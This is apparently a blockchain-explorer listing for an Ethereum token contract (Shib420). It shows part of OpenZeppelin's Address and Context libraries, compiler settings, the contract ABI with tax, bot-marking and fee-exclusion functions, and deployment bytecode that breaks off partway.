     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResultFromTarget(target, success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResultFromTarget(target, success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResultFromTarget(target, success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and revert (either by bubbling
     * the revert reason or using the provided one) in case of unsuccessful call or if target was not a contract.
     *
     * _Available since v4.8._
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        if (success) {
            if (returndata.length == 0) {
                // only check isContract if the call was successful and the return data is empty
                // otherwise we already know that it was a contract
                require(isContract(target), "Address: call to non-contract");
            }
            return returndata;
        } else {
            _revert(returndata, errorMessage);
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason or using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            _revert(returndata, errorMessage);
        }
    }

    function _revert(bytes memory returndata, string memory errorMessage) private pure {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert(errorMessage);
        }
    }
}

File 7 of 7 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"swap","type":"address"},{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"botAddress","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"BlacklistedUser","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromMaxWallet","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokenAmount","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ETHAmount","type":"uint256"}],"name":"LiquidityAdded","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"MaxWalletAmountUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"_enabled","type":"bool"}],"name":"SwapAndLiquifyEnabledUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"devFee","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"treasuryFee","type":"uint256"}],"name":"TreasuryAndDevFeesAdded","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previous","type":"address"},{"indexed":true,"internalType":"address","name":"adr","type":"address"}],"name":"setDevAddress","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previous","type":"address"},{"indexed":true,"internalType":"address","name":"adr","type":"address"}],"name":"setMktAddress","type":"event"},{"inputs":[],"name":"AppliedRatesPercentage","outputs":[{"internalType":"uint256","name":"BurnTax","type":"uint256"},{"internalType":"uint256","name":"LiquidityTax","type":"uint256"},{"internalType":"uint256","name":"MarketingTax","type":"uint256"},{"internalType":"uint256","name":"DevelopmentTax","type":"uint256"},{"internalType":"uint256","name":"RewardTax","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"AutomatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"Bots","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"BuyingTaxes","outputs":[{"internalType":"uint256","name":"BurnTax","type":"uint256"},{"internalType":"uint256","name":"LiquidityTax","type":"uint256"},{"internalType":"uint256","name":"MarketingTax","type":"uint256"},{"internalType":"uint256","name":"DevelopmentTax","type":"uint256"},{"internalType":"uint256","name":"RewardTax","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address payable","name":"newDevAddress","type":"address"}],"name":"ChangeDevAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"add","type":"address"},{"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ChangeExcludeFromFeeToForWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"marketingAddress","type":"address"}],"name":"ChangeMarketingAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"components":[{"internalType":"uint256","name":"BurnTax","type":"uint256"},{"internalType":"uint256","name":"LiquidityTax","type":"uint256"},{"internalType":"uint256","name":"MarketingTax","type":"uint256"},{"internalType":"uint256","name":"DevelopmentTax","type":"uint256"},{"internalType":"uint256","name":"RewardTax","type":"uint256"}],"internalType":"struct Shib420.TaxRates","name":"newTaxes","type":"tuple"},{"internalType":"bool","name":"buying","type":"bool"}],"name":"ChangeTaxes","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"HardCap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"HardCapBuy","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"HardCapSell","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"targetAddress","type":"address"},{"internalType":"bool","name":"isBot","type":"bool"}],"name":"MarkBot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"SellTaxes","outputs":[{"internalType":"uint256","name":"BurnTax","type":"uint256"},{"internalType":"uint256","name":"LiquidityTax","type":"uint256"},{"internalType":"uint256","name":"MarketingTax","type":"uint256"},{"internalType":"uint256","name":"DevelopmentTax","type":"uint256"},{"internalType":"uint256","name":"RewardTax","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"newFlag","type":"bool"}],"name":"SetAutoLiquidity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"pct","type":"uint256"}],"name":"SwapPct","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"TotalFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"TotalSwapped","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"TotalTokenBurn","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"UniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"WalletsExcludedFromFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"WalletsExcludedFromHardCap","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"WeAreLive","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_enabled","type":"bool"}],"name":"setSwapAndLiquifyEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"reflactionaryAmount","type":"uint256"}],"name":"tokenFromReflection","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052733c9016bcb063de91bb67834a3ee42c9a7a4ab21d600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550733c9016bcb063de91bb67834a3ee42c9a7a4ab21d600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000601760006101000a81548160ff0219169083151502179055506000601760016101000a81548160ff0219169083151502179055506001601760026101000a81548160ff0219169083151502179055506001601760036101000a81548160ff0219169083151502179055506040518060a001604052806000815260200160008152602001600581526020016000815260200160008152506018600082015181600001556020820151816001015560408201518160020155606082015181600301556080820151816004015550506040518060a00160405280600081526020016000815260200160208152602001600081526020016000815250601d6000820151816000015560208201518160010155604082015181600201556060820151816003015560808201518160040155505060186022600082015481600001556001820154816001015560028201548160020155600382015481600301556004820154816004015550506040518060e0016040528060008152602001600081526020016000815260200160008152602001600081526020016000815260200160008152506027600082015181600001556020820151816001015560408201518160020155606082015181600301556080820151816004015560a0820151816005015560c082015181600601555050348015620002a757600080fd5b5060405162005909380380620059098339818101604052810190620002cd9190620011e8565b81818160039081620002e09190620014cd565b508060049081620002f29190620014cd565b505050620003156200030962000bd060201b60201c565b62000bd860201b60201c565b82600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620003c6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003ec9190620015b4565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000476573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200049c9190620015b4565b6040518363ffffffff1660e01b8152600401620004bb929190620015f7565b6020604051808303816000875af1158015620004db573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620005019190620015b4565b90506001601360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601160003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160116000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160116000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160116000737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601260003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160126000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160126000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160126000737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555062000aa0336a52b7d2dcc80cd2e400000062000c9e60201b60201c565b62000ad730600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660001962000e0b60201b60201c565b62000ae762000fdc60201b60201c565b60001962000af6919062001653565b60001962000b059190620016ba565b600681905550600654600e60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555062000b6162000fdc60201b60201c565b600a8190555062000b7762000fdc60201b60201c565b600c8190555062000b8d62000fdc60201b60201c565b600b81905550612710600562000ba862000fdc60201b60201c565b62000bb49190620016f5565b62000bc0919062001740565b600d819055505050505062001994565b600033905090565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000d10576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000d0790620017d9565b60405180910390fd5b62000d246000838362000fe660201b60201c565b806002600082825462000d389190620017fb565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000deb919062001847565b60405180910390a362000e076000838362000feb60201b60201c565b5050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000e7d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000e7490620018da565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000eef576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000ee69062001972565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405162000fcf919062001847565b60405180910390a3505050565b6000600254905090565b505050565b505050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620010318262001004565b9050919050565b620010438162001024565b81146200104f57600080fd5b50565b600081519050620010638162001038565b92915050565b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620010be8262001073565b810181811067ffffffffffffffff82111715620010e057620010df62001084565b5b80604052505050565b6000620010f562000ff0565b9050620011038282620010b3565b919050565b600067ffffffffffffffff82111562001126576200112562001084565b5b620011318262001073565b9050602081019050919050565b60005b838110156200115e57808201518184015260208101905062001141565b60008484015250505050565b6000620011816200117b8462001108565b620010e9565b905082815260208101848484011115620011a0576200119f6200106e565b5b620011ad8482856200113e565b509392505050565b600082601f830112620011cd57620011cc62001069565b5b8151620011df8482602086016200116a565b91505092915050565b60008060006060848603121562001204576200120362000ffa565b5b6000620012148682870162001052565b935050602084015167ffffffffffffffff81111562001238576200123762000fff565b5b6200124686828701620011b5565b925050604084015167ffffffffffffffff8111156200126a576200126962000fff565b5b6200127886828701620011b5565b9150509250925092565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620012d557607f821691505b602082108103620012eb57620012ea6200128d565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620013557fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262001316565b62001361868362001316565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620013ae620013a8620013a28462001379565b62001383565b62001379565b9050919050565b6000819050919050565b620013ca836200138d565b620013e2620013d982620013b5565b84845462001323565b825550505050565b600090565b620013f9620013ea565b62001406818484620013bf565b505050565b5b818110156200142e5762001422600082620013ef565b6001810190506200140c565b5050565b601f8211156200147d576200144781620012f1565b620014528462001306565b8101602085101562001462578190505b6200147a620014718562001306565b8301826200140b565b50505b505050565b600082821c905092915050565b6000620014a26000198460080262001482565b1980831691505092915050565b6000620014bd83836200148f565b9150826002028217905092915050565b620014d88262001282565b67ffffffffffffffff811115620014f457620014f362001084565b5b620015008254620012bc565b6200150d82828562001432565b600060209050601f83116001811462001545576000841562001530578287015190505b6200153c8582620014af565b865550620015ac565b601f1984166200155586620012f1565b60005b828110156200157f5784890151825560018201915060208501945060208101905062001558565b868310156200159f57848901516200159b601f8916826200148f565b8355505b6001600288020188555050505b505050505050565b600060208284031215620015cd57620015cc62000ffa565b5b6000620015dd8482850162001052565b91505092915050565b620015f18162001024565b82525050565b60006040820190506200160e6000830185620015e6565b6200161d6020830184620015e6565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000620016608262001379565b91506200166d8362001379565b92508262001680576200167f62001624565b5b828206905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000620016c78262001379565b9150620016d48362001379565b9250828203905081811115620016ef57620016ee6200168b565b5b92915050565b6000620017028262001379565b91506200170f8362001379565b92508282026200171f8162001379565b915082820484148315176200173957620017386200168b565b5b5092915050565b60006200174d8262001379565b91506200175a8362001379565b9250826200176d576200176c62001624565b5b828204905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620017c1601f8362001778565b9150620017ce8262001789565b602082019050919050565b60006020820190508181036000830152620017f481620017b2565b9050919050565b6000620018088262001379565b9150620018158362001379565b925082820190508082111562001830576200182f6200168b565b5b92915050565b620018418162001379565b82525050565b60006020820190506200185e600083018462001836565b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000620018c260248362001778565b9150620018cf8262001864565b604082019050919050565b60006020820190508181036000830152620018f581620018b3565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006200195a60228362001778565b91506200196782620018fc565b604082019050919050565b600060208201905081810360008301526200198d816200194b565b9050919050565b613f6580620019a46000396000f3fe6080604052600436106102345760003560e01c8063715018a61161012e578063a9c21468116100ab578063dd62ed3e1161006f578063dd62ed3e14610876578063df2abc24146108b3578063f2bc6ea4146108dc578063f2fde38b1461090b578063fc962edb146109345761023b565b8063a9c214681461078b578063b897a7f2146107ba578063c49b9a80146107e5578063c59272071461080e578063d43ad1e91461084b5761023b565b80639b4f462d116100f25780639b4f462d1461066c5780639cc29950146106a9578063a457c2d7146106e6578063a9059cbb14610723578063a98aa6ee146107605761023b565b8063715018a6146105ad57806373f33bd3146105c45780638da5cb5b146105ed57806395d89b411461061857806399ec86fe146106435761023b565b8063313ce567116101bc5780634d3314f4116101805780634d3314f4146104b45780635040c6e7146104df578063570eafa71461050a57806368dc04c31461054757806370a08231146105705761023b565b8063313ce567146103e1578063395093511461040c5780633ccfd60b14610449578063407bf9c2146104605780634947a42c1461048b5761023b565b806318160ddd1161020357806318160ddd146102fc5780631850e44f1461032757806323b872dd1461035057806327b827041461038d5780632d838119146103a45761023b565b8063055add0d1461024057806306fdde031461026b578063095ea7b3146102965780630a4ea202146102d35761023b565b3661023b57005b600080fd5b34801561024c57600080fd5b50610255610963565b6040516102629190612c10565b60405180910390f35b34801561027757600080fd5b50610280610989565b60405161028d9190612cbb565b60405180910390f35b3480156102a257600080fd5b506102bd60048036038101906102b89190612d60565b610a1b565b6040516102ca9190612dbb565b60405180910390f35b3480156102df57600080fd5b506102fa60048036038101906102f59190612e14565b610a3e565b005b34801561030857600080fd5b50610311610b66565b60405161031e9190612e50565b60405180910390f35b34801561033357600080fd5b5061034e60048036038101906103499190612e97565b610b70565b005b34801561035c57600080fd5b5061037760048036038101906103729190612ed7565b610bd3565b6040516103849190612dbb565b60405180910390f35b34801561039957600080fd5b506103a2610c02565b005b3480156103b057600080fd5b506103cb60048036038101906103c69190612f2a565b610c27565b6040516103d89190612e50565b60405180910390f35b3480156103ed57600080fd5b506103f6610c88565b6040516104039190612f73565b60405180910390f35b34801561041857600080fd5b50610433600480360381019061042e9190612d60565b610c91565b6040516104409190612dbb565b60405180910390f35b34801561045557600080fd5b5061045e610cc8565b005b34801561046c57600080fd5b50610475610d61565b6040516104829190612e50565b60405180910390f35b34801561049757600080fd5b506104b260048036038101906104ad9190612f8e565b610d67565b005b3480156104c057600080fd5b506104c9610e51565b6040516104d69190612e50565b60405180910390f35b3480156104eb57600080fd5b506104f4610e57565b6040516105019190612e50565b60405180910390f35b34801561051657600080fd5b50610531600480360381019061052c9190612fbb565b610e5d565b60405161053e9190612dbb565b60405180910390f35b34801561055357600080fd5b5061056e60048036038101906105699190612f2a565b610e7d565b005b34801561057c57600080fd5b5061059760048036038101906105929190612fbb565b610eb8565b6040516105a49190612e50565b60405180910390f35b3480156105b957600080fd5b506105c2610f09565b005b3480156105d057600080fd5b506105eb60048036038101906105e691906130f4565b610f1d565b005b3480156105f957600080fd5b50610602610fa5565b60405161060f9190613143565b60405180910390f35b34801561062457600080fd5b5061062d610fcf565b60405161063a9190612cbb565b60405180910390f35b34801561064f57600080fd5b5061066a60048036038101906106659190612e14565b611061565b005b34801561067857600080fd5b50610693600